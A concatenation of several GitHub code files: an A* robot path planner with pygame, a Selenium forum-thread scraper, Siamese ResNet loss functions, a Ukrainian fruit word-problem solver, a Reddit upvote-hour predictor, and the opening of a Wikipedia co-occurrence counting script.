Graph:\n\n def __init__(self, start, end, RPM1, RPM2, radius, cl):\n self.visited = {}\n self.endX = end.i\n self.endY = end.j\n self.RPM1 = RPM1\n self.RPM2 = RPM2\n self.radius = radius\n self.cl = cl + self.radius\n\n def new_coords(self, i, j, theta, UL, UR):\n t = 0\n r = 0.22\n L = 0.287\n dt = 0.1\n\n UL = 3.14*UL/30\n UR = 3.14*UR/30\n\n newX = i\n newY = j\n newTheta = 3.14 * theta/180\n D = 0\n\n while t < 1:\n t = t + dt\n Delta_Xn = 0.5 * r * (UL + UR) * math.cos(newTheta) * dt\n Delta_Yn = 0.5 * r * (UL + UR) * math.sin(newTheta) * dt\n newX += Delta_Xn\n newY += Delta_Yn\n newTheta += (r / L) * (UR - UL) * dt\n D = D + math.sqrt(math.pow(Delta_Xn, 2) + math.pow(Delta_Yn, 2))\n newTheta = 180*newTheta/3.14\n\n if newTheta > 0:\n newTheta = newTheta % 360\n elif newTheta < 0:\n newTheta = (newTheta + 360) % 360\n\n newX = self.round_num(newX)\n newY = self.round_num(newY)\n\n return newX, newY, newTheta, D\n def neighbours(self, currentNode):\n i, j, theta = currentNode.i, currentNode.j, currentNode.theta\n neighbours = {}\n valid_actions = {}\n actions = [[0, self.RPM1], [self.RPM1, 0], [self.RPM1, self.RPM1], [0, self.RPM2], [self.RPM2, 0], [self.RPM2, self.RPM2], [self.RPM1, self.RPM2], [self.RPM2, self.RPM1]]\n for UL, UR in actions:\n x, y, newTheta, distance = self.new_coords(i, j, theta, UL, UR)\n if (not self.isOutsideArena(x, y)) and (not self.isAnObstacle(x, y)):\n newNode = Node(x, y, self.endX, self.endY, newTheta)\n neighbours[newNode] = distance\n valid_actions[newNode] = [UL, UR]\n return neighbours, valid_actions\n\n \n\n def drawActionSet(self, x, y, theta, UL, UR, color):\n t = 0\n r = 0.22\n L = 0.287\n dt = 0.1\n\n newX = x\n newY = y\n newTheta = 3.14*theta/180\n UL = 3.14*UL/30\n UR = 3.14*UR/30\n\n while t < 1:\n t = t + dt\n oldX = newX\n oldY = newY\n newX += 0.5 * r * (UL + UR) * math.cos(newTheta) * dt\n newY += 0.5 * r * (UL + UR) * math.sin(newTheta) * dt\n pygame.draw.line(gridDisplay, color, [int(50*oldX), int(h - 50*oldY)], [int(50*newX), int(h - 50*newY)], 2)\n newTheta += (r / L) * (UR - UL) * dt\n pygame.display.update()\n time.sleep(0.1)\n\n return\n\n\n def round_num(self, i):\n\n i = 50*i\n i = int(i)\n i = i/50\n return i\n\n def generateGraph(self):\n gridDisplay.fill(white)\n pygame.draw.circle(gridDisplay, black, [100, int(h - 100)], 50)\n pygame.draw.circle(gridDisplay, 
black, [100, int(h - 400)], 50)\n        pygame.draw.polygon(gridDisplay, black, [(int(50*0.25), int(h - 50*5.75)), (int(50*1.75), int(h - 50*5.75)), (int(50*1.75), int(h - 50*4.25)), (50*0.25, h - 50*4.25)])\n        pygame.draw.polygon(gridDisplay, black, [(int(50*3.75), int(h - 50*5.75)), (int(50*6.25), int(h - 50*5.75)), (int(50*6.25), int(h) - int(50*4.25)), (int(50*3.75), int(h - 50*4.25))])\n        pygame.draw.polygon(gridDisplay, black, [(int(50*7.25), int(h - 50*4)), (int(50*8.75), int(h - 50*4)), (int(50*8.75), int(h - 50*2)), (int(50*7.25), int(h - 50*2))])\n\n    def performAStar(self, start, end):\n        if self.isAnObstacle(start.i, start.j) and self.isAnObstacle(end.i, end.j):\n            print(\"Starting and ending point are inside the obstacle!\")\n            return\n\n        if self.isAnObstacle(start.i, start.j):\n            print(\"Starting point is inside the obstacle!\")\n            return\n        if self.isAnObstacle(end.i, end.j):\n            print(\"Ending point is inside the obstacle!\")\n            return\n\n        if self.isOutsideArena(start.i, start.j):\n            print(\"Starting point is outside the arena!\")\n            return\n\n        if self.isOutsideArena(end.i, end.j):\n            print(\"Ending point is outside the arena!\")\n            return\n\n        print(\"Started A-star algorithm\")\n        priorityQueue = []\n        visited_list = {}\n        heapq.heappush(priorityQueue, (start.cost, start))\n        while len(priorityQueue):\n            currentNode = heapq.heappop(priorityQueue)\n            currentNode = currentNode[1]\n            if self.isInTargetArea(currentNode.i, currentNode.j):\n                print(\"Found a path!\")\n                return True\n\n            if tuple([currentNode.i, currentNode.j]) in visited_list:\n                continue\n            visited_list[tuple([currentNode.i, currentNode.j])] = True\n\n            currentDistance = currentNode.costToCome\n            neighbours, valid_actions = self.neighbours(currentNode)\n            currentNode.neighbours = neighbours\n            currentNode.valid_actions = valid_actions\n            for neighbourNode, newDistance in neighbours.items():\n                neighbourNode.costToCome = currentDistance + newDistance\n                neighbourNode.cost = neighbourNode.costToCome + neighbourNode.costToGo\n                neighbourNode.parent = currentNode\n                heapq.heappush(priorityQueue, (neighbourNode.cost, neighbourNode))\n                print((neighbourNode.i, neighbourNode.j))\n        print(\"No path found\")\n        return False\n\n    def visualize(self, start, end):\n\n        visited_list = {}\n        priorityQueue = []\n        heapq.heappush(priorityQueue, (start.cost, start))\n        pygame.draw.circle(gridDisplay, black, [int(50*start.i), int(h - 50*start.j)], 5)\n        pygame.draw.circle(gridDisplay, black, [int(50*end.i), int(h - 50*end.j)], 5)\n        pygame.display.update()\n        while len(priorityQueue):\n\n            currentNode = heapq.heappop(priorityQueue)\n            currentNode = currentNode[1]\n\n            if self.isInTargetArea(currentNode.i, currentNode.j):\n                self.backTrack(currentNode)\n                print(\"Total distance from start to goal is:\", currentNode.costToCome)\n                return\n\n            if tuple([currentNode.i, currentNode.j]) in visited_list:\n                continue\n            visited_list[tuple([currentNode.i, currentNode.j])] = True\n\n            for neighbourNode, action in currentNode.valid_actions.items():\n                self.drawActionSet(currentNode.i,currentNode.j,currentNode.theta,action[0],action[1],red)\n\n            for neighbourNode, newDistance in currentNode.neighbours.items():\n                heapq.heappush(priorityQueue, (neighbourNode.cost, neighbourNode))\n\n        return\n\n    def isInTargetArea(self, i, j):\n        \n        if (i - self.endX) ** 2 + (j - self.endY) ** 2 - 0.01 <= 0:\n            return True\n        else:\n            return False\n\n    def backTrack(self, child):\n        while child != None:\n            path.append(child)\n            print(child.i, child.j, \"Path\")\n            child = child.parent\n        return True\n
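\n    # Obstacle geometry for the 10 x 10 arena (see generateGraph above): two\n    # circles of radius 1 centred at (2, 8) and (2, 2), plus one square and two\n    # axis-aligned rectangles. Every check below inflates the shape by self.cl,\n    # which already includes the robot radius plus the user-supplied clearance.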
\n    def isAnObstacle(self, x, y):\n\n        # Boundary condition\n        if (x < 0) or (x > 10) or (y < 0) or (y > 10): \n            return True\n        \n        # Obstacle 1 (Circle Up)\n        elif (x-2)**2 + (y-8)**2 - (1+self.cl)**2 <= 0: \n            return True\n        \n        # Obstacle 2 (Square) \n        elif x >= 0.25-self.cl and x <= 1.75+self.cl and y >= 4.25-self.cl and y <= 5.75+self.cl: \n            return True\n        \n        # Obstacle 3 (Rectangle Up)\n        elif x >= 3.75-self.cl and x <= 6.25+self.cl and y >= 4.25-self.cl and y <= 5.75+self.cl: \n            return True\n        \n        # Obstacle 4 (Circle Down)\n        elif (x-2)**2 + (y-2)**2 - (1+self.cl)**2 <= 0: \n            return True\n        \n        # Obstacle 5 (Rectangle Down)\n        elif x >= 7.25-self.cl and x <= 8.75+self.cl and y >= 2-self.cl and y <= 4+self.cl: \n            return True\n        \n        # Node in Freespace\n        else:\n            return False \n        \n\n\n    def isOutsideArena(self, x, y):\n\n        return True if x < self.cl or y < self.cl or x > 10 - self.cl or y > 10 - self.cl else False\n\n\nx1 = float(input(\"Enter the x coordinate of the starting point: \"))\ny1 = float(input(\"Enter the y coordinate of the starting point: \"))\nthetaStart = int(input(\"Enter the start theta: \"))\nprint(\"#############################################\")\n\nx2 = float(input(\"Enter the x coordinate of the ending point: \"))\ny2 = float(input(\"Enter the y coordinate of the ending point: \"))\nprint(\"#############################################\")\n\nRPM1 = float(input(\"Enter RPM1: \"))\nRPM2 = float(input(\"Enter RPM2 \"))\nradius = float(input(\"Enter the radius of the robot: \"))\ncl = float(input(\"Enter the cl: \"))\n\n#############################################\n# Algorithm Driver\nend = Node(x2, y2, x2, y2, 0)\nstart = Node(x1, y1, x2, y2, thetaStart)\nstart.costToCome = 0\nrobot = Graph(start, end, RPM1, RPM2, radius, cl)\npath = []\n\n# Check if path can be found\nif robot.performAStar(start, end):\n    pygame.init() # Setup Pygame\n    gridDisplay = pygame.display.set_mode((w, h))\n    pygame.display.set_caption(\"A* Algorithm\")\n    exiting = False\n    clock = pygame.time.Clock()\n    grid = [[0 for j in range(h)] for i in range(w)]\n    canvas = Graph(start, end, RPM1, RPM2, radius, cl)\n    canvas.generateGraph()\n    robot.visualize(start, end)\n    path.reverse()\nelse:\n    # No Path Found\n    exiting = True\n\nwhile not exiting:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            exiting = True\n\n    # Visualizing the final path\n    for index in range(len(path)-1):\n        node = path[index]\n        action = node.valid_actions[path[index+1]]\n        robot.drawActionSet(node.i, node.j, node.theta, action[0], action[1], black)\n\n\n    clock.tick(2000)\n    pygame.display.flip()\n    exiting = True\npygame.quit()\n","repo_name":"AdityaVaradaraj/A_Star_Project3_Phase_2","sub_path":"part_1/a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":10546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"160645430","text":"import requests\r\nfrom lxml import etree\r\nfrom selenium import webdriver\r\nimport json\r\nimport re\r\nimport pandas as pd\r\nfrom pandas import ExcelWriter\r\nimport time\r\nimport openpyxl\r\nfrom openpyxl import load_workbook\r\nimport os.path\r\nimport sqlite3\r\n\r\ndef getPageNum(url, driver):\r\n\r\n    # Get the Post\r\n    driver.get(url)\r\n    Page = driver.page_source\r\n    Tree = etree.HTML(Page)\r\n    DataNode = ''.join(Tree.xpath('//script/text()'))\r\n    Data = re.search(r'window.__PRELOADED_STATE__ = {.*}$', DataNode).group()\r\n    ParsedData = ''.join(re.search(r'{.*}', Data).group())\r\n\r\n    # Process the JSON data\r\n    j = json.loads(ParsedData) # 
print(j['topic']) # print(j['thread']) # print(j['thread']['replies'])\r\n\r\n    return j['thread']['totalPage']\r\n\r\ndef fetch(url,PageNum,driver, ThreadID):\r\n\r\n    Columns = ['ReplyID', 'Forum', 'Index', 'AuthorID', 'AuthorName', 'AuthorGender', 'Content', 'ReplyDate', 'ThreadID']\r\n    Thread = pd.DataFrame(columns=Columns, dtype=object)\r\n    Database = sqlite3.connect('Thread.sqlite3')\r\n\r\n    for i in range(1,PageNum+1):\r\n\r\n        # Get the Post\r\n        print(\"Getting:\" + url + \"&page=\" + str(i))\r\n        driver.get(url + \"&page=\" + str(i))\r\n        time.sleep(2)\r\n\r\n        Page = driver.page_source\r\n        Tree = etree.HTML(Page)\r\n        DataNode = ''.join(Tree.xpath('//script/text()'))\r\n        Data = re.search(r'window.__PRELOADED_STATE__ = {.*}$', DataNode).group()\r\n        ParsedData = ''.join(re.search(r'{.*}', Data).group())\r\n\r\n        # Process the JSON data\r\n        j = json.loads(ParsedData) # print(j['topic']) # print(j['thread']) # print(j['thread']['replies'])\r\n        for Post in j['thread']['replies']:\r\n            Post['content'] = re.sub('&gt;', '>', Post['content'])\r\n            Post['content'] = re.sub('&quot;', '\\\\\"', Post['content'])\r\n            Post['content'] = re.sub('\\r<br />', '\\n', Post['content'])
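\r\n            # Normalise the scraped forum HTML: decode &gt; / &quot; entities and\r\n            # turn <br /> tags into plain newlines before the leftover markup\r\n            # is stripped further below.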
', '\\n', Post['content'])\r\n Post['content'] = re.sub('
', '\\n', Post['content'])\r\n Post['content'] = \"\" + Post['content'] + \"\"\r\n Tree = etree.HTML(Post['content'])\r\n Post['content'] = ''.join(Tree.xpath('//body/text()'))\r\n Post['content'] = re.sub('<.*?>', '', Post['content'])\r\n Post['content'] = re.sub('[;\\n\\\\.,,。]', ' ', Post['content'])\r\n Post['content'] = re.sub(' {2,}', ' ', Post['content'])\r\n Post['content'] = Post['content'].strip(' ');\r\n\r\n for Post in j['thread']['replies']:\r\n if len(Post['content']) > 1:\r\n Post['ThreadID'] = ThreadID\r\n Record = pd.DataFrame([list(Post.values())], columns=Columns, dtype=object)\r\n ExportToSQLite(Database, Record)\r\n Thread = Thread.append(Record)\r\n\r\n Thread.set_index('Index', inplace=True)\r\n Thread.reset_index(drop=True, inplace=True)\r\n Thread.index.name = 'Index'\r\n\r\n print(Thread.to_string())\r\n print(\"Complete\" + \":\" + url)\r\n\r\n return Thread\r\n\r\ndef ExportToSQLite(Database, Record):\r\n try:\r\n Record.to_sql('Thread', Database, index=False, if_exists='append')\r\n except sqlite3.IntegrityError:\r\n pass\r\n\r\ndef ExportToCSV(Thread):\r\n if os.path.isfile('Thread.csv'):\r\n Thread.to_csv('Thread.csv', encoding='utf_8_sig', mode='a', header=False)\r\n else:\r\n Thread.to_csv('Thread.csv', encoding='utf_8_sig')\r\n\r\ndef ExportToExcel(Thread): # Not in Used\r\n\r\n writer = ExcelWriter('Thread.xlsx')\r\n\r\n if os.path.isfile('Thread.xlsx'):\r\n book = load_workbook('Thread.xlsx')\r\n if ThreadID in book.sheetnames:\r\n stn = book.get_sheet_by_name(ThreadID)\r\n book.remove_sheet(stn)\r\n writer.book = book\r\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\r\n\r\n Thread.to_excel(writer, 'Sheet')\r\n writer.save()\r\n\r\ndef main():\r\n\r\n # Disable Browser Pop up\r\n Option = webdriver.ChromeOptions()\r\n Option.add_argument('headless')\r\n\r\n # Disable Image\r\n prefs = {\"profile.managed_default_content_settings.images\": 2}\r\n Option.add_experimental_option(\"prefs\", prefs)\r\n\r\n # Get the Javascript Website\r\n driver = webdriver.Chrome(executable_path='C:\\Chrome\\chromedriver.exe', chrome_options=Option)\r\n\r\n # Fetch\r\n url = \"https://hkug.arukascloud.io/topics/2/6975952?forum=HKG\"\r\n PageNum = getPageNum(url, driver)\r\n Thread = fetch(url,PageNum,driver,str(873403))\r\n\r\n # Closed the Driver\r\n driver.close();\r\n\r\nif __name__ == '__main__': # Function inside this block will not be Executed\r\n main();","repo_name":"Nelson5923/Final-Year-Project","sub_path":"ForumCrawler/FetchSingleThread.py","file_name":"FetchSingleThread.py","file_ext":"py","file_size_in_byte":4541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8184358601","text":"import pdb\n\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom tbv.models.resnet_factory import ResNetConvBackbone\n\n\ndef contrastive_loss(y_c: torch.Tensor, pred_dists: torch.Tensor, margin: int = 1) -> torch.Tensor:\n \"\"\"\n Compute the similarities in the separation loss (4) by\n computing average pairwise similarities between points\n in the embedding space.\n element-wise square, element-wise maximum of two tensors.\n Contrastive loss also defined in:\n -\t\"Dimensionality Reduction by Learning an Invariant Mapping\"\n by Raia Hadsell, Sumit Chopra, Yann LeCun\n Args:\n y_c: Indicates if pairs share the same semantic class label or not\n pred_dists: Distances in the embeddding space between pairs.\n\n Returns:\n tensor representing contrastive loss values.\n \"\"\"\n N = 
pred_dists.shape[0]\n\n # corresponds to \"d\" in the paper. If same class, pull together.\n # Zero loss if all same-class examples have zero distance between them.\n pull_losses = y_c * torch.pow(pred_dists, 2)\n # corresponds to \"k\" in the paper. If different class, push apart more than margin\n # if semantically different examples have distances are in [0,margin], then there WILL be loss\n zero = torch.zeros(N)\n device = y_c.device\n zero = zero.to(device)\n # if pred_dists for non-similar classes are <1, then incur loss >0.\n clamped_dists = torch.max(margin - pred_dists, zero)\n push_losses = (1 - y_c) * torch.pow(clamped_dists, 2)\n return torch.mean(pull_losses + push_losses)\n\n\ndef paired_euclidean_distance(X: torch.Tensor, Y: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Compute the distance in the semantic alignment loss (3) by\n computing average pairwise distances between *already paired*\n points in the embedding space.\n Note this is NOT computed between all possible pairs. Rather, we\n compare i'th vector of X vs. i'th vector of Y (i == j always).\n\n Args:\n X: Pytorch tensor of shape (N,D) representing N embeddings of dim D\n Y: Pytorch tensor of shape (N,D) representing N embeddings of dim D\n Returns:\n dists: Pytorch tensor of shape (N,) representing distances between fixed pairs\n \"\"\"\n device = X.device\n N, D = X.shape\n assert Y.shape == X.shape\n eps = 1e-08 * torch.ones((N, 1))\n eps = eps.to(device) # make sure in same memory (CPU or CUDA)\n # compare i'th vector of x vs. i'th vector of y (i == j always)\n diff = torch.pow(X - Y, 2)\n\n affinities = torch.sum(diff, dim=1, keepdim=True)\n # clamp the affinities to be > 1e-8 ?? Unclear why the authors do this...\n affinities = torch.max(affinities, eps)\n return torch.sqrt(affinities)\n\n\ndef smooth_triplet_loss(embeddings: torch.Tensor, triplet_idxs: np.ndarray) -> torch.Tensor:\n \"\"\"\n N. N. Vo and J. Hays. Localizing and orienting street views\n using overhead imagery. ECCV 16.\n\n K. Sohn. Improved deep metric learning with multi-class npair\n loss objective. NIPS, 2016\n\n A. Hermans, L. Beyer, and B. Leibe. In defense of the\n triplet loss for person re-identification. 
arXiv, 2017.\n\n Ref:\n https://arxiv.org/pdf/1803.03310.pdf\n https://github.com/lugiavn/generalization-dml/blob/master/nams.py\n\n d is the squared Euclidean distance (negative dot\n product can also be used instead).\n\n Normalize the image feature to have unit magnitude and\n then scale it by 4,\n \"\"\"\n # dist from anchors to negatives\n an_dists = paired_euclidean_dists(embeddings, a, n)\n # dist from anchors to positives\n ap_dists = pair_dists(embeddings, a, p)\n return torch.log(1 + torch.exp(an_dists - ap_dists))\n\n\ndef test_smooth_triplet_loss():\n \"\"\" \"\"\"\n pass\n\n\nclass SiameseTripletResnet(nn.Module):\n def __init__(self, num_layers: int, pretrained: bool) -> None:\n \"\"\" \"\"\"\n super(SiameseTripletResnet, self).__init__()\n self.net = ResNetConvBackbone(num_layers, pretrained)\n\n def forward(self, x_a: torch.Tensor, x_p: torch.Tensor, x_n: torch.Tensor) -> torch.Tensor:\n \"\"\"anchor, positive, negative\"\"\"\n pdb.set_trace()\n\n x_a = self.net(x_a)\n x_p = self.net(x_p)\n x_n = self.net(x_n)\n\n loss = smooth_triplet_loss()\n\n # do some inference here, based on some thresholded distance\n output = x_a, x_p, x_n\n return output, loss\n\n\nclass SiameseContrastiveResnet(nn.Module):\n def __init__(self, num_layers: int, pretrained: bool) -> None:\n \"\"\" \"\"\"\n super(SiameseContrastiveResnet, self).__init__()\n self.net = ResNetConvBackbone(num_layers, pretrained)\n\n def forward(self, x: torch.Tensor, xstar: torch.Tensor, y_c: torch.Tensor):\n \"\"\"y_c: whether they belong to the same class\n\n Args:\n x: NCHW tensor\n xstar: NCHW tensor\n y_c: (N,) tensor\n \"\"\"\n # get back (N,512) embeddings\n x = self.net(x)\n xstar = self.net(xstar)\n\n # TODO: should we normalize the embeddings first?\n\n # pass in the corresponding embeddings\n # inputs must be (N,D)\n pred_dists = paired_euclidean_distance(x, xstar)\n loss = contrastive_loss(y_c, pred_dists)\n\n return pred_dists, loss\n","repo_name":"johnwlambert/tbv","sub_path":"tbv/models/siamese_resnet.py","file_name":"siamese_resnet.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"10988616417","text":"import nltk\nfrom difflib import get_close_matches\n\ntest = \"На столі було. 
Скільки всього фруктів залишилось на столі?\"\nfruits = ['апельсин', 'яблуко', 'груша', 'мандарин', 'банан']\nactions_plus = [\"є\", \"було\", \"поклав\"]\naction = [\"залишилось\"]\nactions_minus = [\"з'їв\", \"забрав\"]\n\n\nclass SimpleAI:\n def __init__(self):\n self.num_of_fruits_start = 0\n self.num_of_fruits = 0\n self.stop_word = 'Скільки'\n self.conditions = {}\n self.question = []\n self.start_state = {}\n self.response = ''\n self.error_case = 0\n\n def sentence_analyzer(self, text):\n sentences = nltk.sent_tokenize(text)\n self.starting_handler(sentences[0])\n for sentence in sentences[1:]:\n if sentence.startswith(self.stop_word):\n self.question_handler(sentence)\n else:\n w = nltk.word_tokenize(sentence)\n self.action_analyzer(w)\n if len(self.question) == 0:\n self.error_case = 1\n self.error_handler()\n elif len(self.conditions) == 0:\n self.error_case = 2\n self.error_handler()\n return self.response\n\n def question_handler(self, sentence):\n words = nltk.word_tokenize(sentence)\n for i in words:\n if len(get_close_matches(i, fruits)) > 0:\n self.question.append(i)\n if i in action or i in actions_plus or i in actions_minus:\n self.question.append(i)\n if i == 'фруктів':\n self.question.append(i)\n self.final_constructor(self.question)\n\n def starting_handler(self, sentence):\n description = nltk.word_tokenize(sentence)\n for word in description:\n f_m = get_close_matches(word, fruits)\n if len(f_m) > 0:\n num_or_not = description[description.index(word) - 1]\n try:\n self.conditions[f_m[0]] = int(num_or_not)\n self.start_state[f_m[0]] = int(num_or_not)\n self.num_of_fruits_start += int(num_or_not)\n except ValueError:\n pass\n\n def action_analyzer(self, sentence):\n w_m = []\n for word in sentence:\n f_m = get_close_matches(word, fruits)\n a_m = get_close_matches(word, actions_minus)\n if len(a_m) > 0:\n w_m.append(a_m)\n a_p = get_close_matches(word, actions_plus)\n if len(a_p) > 0:\n w_m.append(a_p)\n if len(f_m) > 0:\n num_or_not = sentence[sentence.index(word) - 1]\n try:\n if w_m[-1][0] in actions_minus:\n self.conditions[f_m[0]] -= int(num_or_not)\n elif w_m[-1][0] in actions_plus:\n self.conditions[f_m[0]] += int(num_or_not)\n except ValueError:\n pass\n self.num_of_fruits = self.num_of_fruits_start - sum(self.conditions.values())\n return w_m\n\n def error_handler(self):\n if self.error_case == 1:\n self.response = 'У задачі повинні бути питання, які починаються зі слова \"Скільки\".'\n elif self.error_case == 2:\n self.response = 'У задачі відсутня умова з фруктами. 
Повинна бути присутня умова про хлопчика,' \\\n ' який виконує дії з фруктами.'\n print(self.response)\n\n def final_constructor(self, question_list):\n final = ''\n if len(get_close_matches(self.question[0], fruits)) > 0 or self.question[0] == 'фруктів':\n self.question.reverse()\n for word in question_list:\n if action[0] in self.question:\n if len(get_close_matches(word, fruits)) > 0:\n final = 'На столі залишилось {} {}.'.format(self.conditions[get_close_matches(word, fruits)[0]],\n word)\n elif word == 'фруктів':\n final = 'На столі залишилось {} {}.'.format(self.num_of_fruits_start - self.num_of_fruits, word)\n elif self.question[0] in actions_minus:\n if len(get_close_matches(word, fruits)) > 0:\n final = 'Хлопчик {} {} {}.'.format(self.question[0],\n self.start_state[get_close_matches(word, fruits)[0]]\n - self.conditions[get_close_matches(word, fruits)[0]], word)\n elif word == 'фруктів':\n final = 'Хлопчик {} {} {}'.format(self.question[0], self.num_of_fruits, word)\n elif self.question[0] in actions_plus:\n if len(get_close_matches(word, fruits)) > 0:\n final = 'Хлопчик {} {} {}.'.format(self.question[0],\n self.conditions[get_close_matches(word, fruits)[0]\n - self.start_state[get_close_matches(word, fruits)[0]]], word)\n elif word == 'фруктів':\n final = 'Хлопчик {} {} {}.'.format(self.question[0],\n sum(self.conditions.values()) - sum(self.start_state.values()),\n word)\n\n self.response = final\n if len(self.conditions) != 0:\n print(self.response)\n return final\n\n\ns = SimpleAI()\ns.sentence_analyzer(test)\n","repo_name":"johnnyblame/simpleAI","sub_path":"AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":5896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13362600491","text":"\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer \nfrom sklearn.preprocessing import StandardScaler\nfrom scipy.sparse import hstack\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import Ridge,LinearRegression\nfrom sklearn.metrics import r2_score,accuracy_score\nimport joblib\nfrom VADdet import analyze\nimport numpy as np\n\npath = \"../files/new_train_test/new_tTrain_data.csv\"\n\ndata = pd.read_csv(path)\ncalculated = pd.DataFrame(columns=['actual_score','hour_pred'])\ndata_removed = data.drop(['redditor','type','text','proc_text','proc_title','genre','absolute_words_ratio','neg_log_prob_aw_ratio'],axis = 1)\n\ndata_removed = data_removed.dropna(subset = ['title','subreddit','datetime','valence','arousal','dominance','hour'])\n\n\ntrain_x ,y = data_removed.drop('score',axis = 1), data_removed[['score']]\n\ntfidf_subreddit = TfidfVectorizer(ngram_range=(1, 1), max_features=None)\nsubreddit_sparse = tfidf_subreddit.fit_transform(train_x['subreddit'])\n\n\n#changing ngram range \ntfidf_title = TfidfVectorizer(ngram_range=(2, 5), max_features=None)\ntitle_sparse = tfidf_title.fit_transform(train_x['title'])\n\nhour = train_x[['hour']]\nvalence = train_x[['valence']]\narousal = train_x[['arousal']]\ndominance = train_x[['dominance']]\n\nscaler = StandardScaler()\nscaled_date = scaler.fit_transform(hour)\nscaled_val = np.hstack([scaled_date,valence,arousal,dominance])\n\nml_model = joblib.load(\"mlp_hour.joblib\")\n\nhour_clock = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24]\ntime = [[10]]\nsubredddit = [\"books\"]\ntitle = \"Pizza Hut's BOOK IT! 
summer reading camp is back and we have so much nostalgia\"\nmode = \"mean\"\nV = A = D = 0\nV,A,D = analyze(title,mode)\nV/=10\nA/=10\nD/=10\n\nsub_sparse = tfidf_subreddit.transform(subredddit)\ntit_sparse = tfidf_title.transform([title])\ntime_sparse = scaler.transform(time)\n\npred_sparse = hstack([tit_sparse,sub_sparse,time_sparse])\nresult = ml_model.predict(pred_sparse)\nfor hour in hour_clock:\n if hour != time:\n time_sparse = scaler.transform([[hour]])\n vad_sparse = np.hstack([time_sparse,[[V]],[[A]],[[D]]])\n pred_sparse = hstack([tit_sparse,sub_sparse,vad_sparse])\n test_res = ml_model.predict(pred_sparse)\n if test_res>result:\n print(f\"\\nYOU WOULD GET {test_res} UPVOTES IF YOU POSTED AT {hour}\")\n\nprint(result)\n","repo_name":"Neel-G-png/reddit-post-outreach-prediction","sub_path":"hour_model/check_hour_prediction.py","file_name":"check_hour_prediction.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"1463861618","text":"'''\nminimum cost of shortest path\n\n2 8 6\n3 5 4\n4 3 2\n'''\n\nimport cv2\nimport numpy as np\n\nimg = np.array([[2,8,6],[3,5,4],[4,3,2]])\n\nh = 3\nw = 3\n\ncost = np.zeros([h,w,1],np.uint8)\n\nfor i in range(0,h):\n\tfor j in range(0,w):\n\t\t\tif (i==0 or j==0):\n\t\t\t\tcost[i][j] = img[i][j]\n\t\t\telse:\n\t\t\t\tcost[i][j] = min(cost[i-1][j-1],cost[i][j-1],cost[i-1][j]) + img[i][j]\nprint(cost[h-1][w-1])","repo_name":"ShrayaniMondal/ImageProcessing","sub_path":"Prog31/prg31_matrix.py","file_name":"prg31_matrix.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"10669017408","text":"\"\"\"\nThis script should be called with parameters specifying which chunk of wikipedia to process and size of chunk \n(number of articles to process).\nGiven the chunk number, this script iterates through each wikipedia article in the chunk, dependency parses\neach sentence, and accumulates the co-occurence counts between word pairs (adjective-noun and verb-object) and\ncontext words. This requires the stanford coreNLP server to be running locally on port 9000, and requires\naccess to a file containg the dictionary of words we consider (one word per line). 
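The minimum-cost-path record just above (prg31_matrix.py) hard-codes a 3x3 grid, accumulates costs in a uint8 array, and seeds the whole first row and first column with the raw cell values rather than running sums, so border paths are under-counted. Below is a minimal dependency-free sketch of the usual dynamic programme with accumulating borders; the function name and the assert are illustrative, not from the record.

def min_cost_path(grid):
    # cost[i][j] = cheapest cost to reach (i, j) moving down, right, or diagonally
    h, w = len(grid), len(grid[0])
    cost = [[0] * w for _ in range(h)]
    for i in range(h):
        for j in range(w):
            if i == 0 and j == 0:
                cost[i][j] = grid[i][j]
            elif i == 0:
                cost[i][j] = cost[i][j - 1] + grid[i][j]   # first row accumulates from the left
            elif j == 0:
                cost[i][j] = cost[i - 1][j] + grid[i][j]   # first column accumulates from above
            else:
                cost[i][j] = min(cost[i - 1][j - 1], cost[i - 1][j], cost[i][j - 1]) + grid[i][j]
    return cost[-1][-1]

# the record's example grid: the best path runs down the diagonal, 2 -> 5 -> 2
assert min_cost_path([[2, 8, 6], [3, 5, 4], [4, 3, 2]]) == 9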
It also requires a compressed\ndump of wikipedia in .bz2 format.\n\nBe sure to appropriately specify the file paths, all of which are listed after the command-line arguments are read.\n\"\"\"\nimport sys\nimport os\nimport numpy as np\nfrom collections import Counter, defaultdict\nimport pickle\nfrom nltk.parse.corenlp import CoreNLPDependencyParser as dep_parser\nimport gensim\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport wikicorpus_sentence as ws\n\ndef main():\n # read command-line arguments\n for arg in sys.argv:\n if arg.startswith('--job='):\n job_iter = int(arg.split('--job=')[1])\n if arg.startswith('--num_articles='):\n num_articles = int(arg.split('--num_articles=')[1])\n\n # SPECIFY THESE FILE PATHS APPROPRIATELY\n path_to_coreNLP_server = 'http://localhost:{}'.format(9000) # specify the port where CoreNLP server is running\n compressed_wiki = '~/enwiki-latest-pages-articles.xml.bz2' # path to the compressed wiki dump\n vocab_file = \"~/research/datasets/rw_vocab_no_stopwords.txt\" # location of the vocab file (one word (string) per line)\n save_path_triple_an = \"triple_counts_an_{}.pkl\".format(job) # save path for adjective-noun-context_word triple counts\n save_path_wordpair_an = \"wordpair_counts_an_{}.pkl\".format(job) # save path for adjective-noun pair counts\n save_path_triple_vo = \"triple_counts_vo_{}.pkl\".format(job) # save path for verb-object-context_word triple counts\n save_path_wordpair_vo = 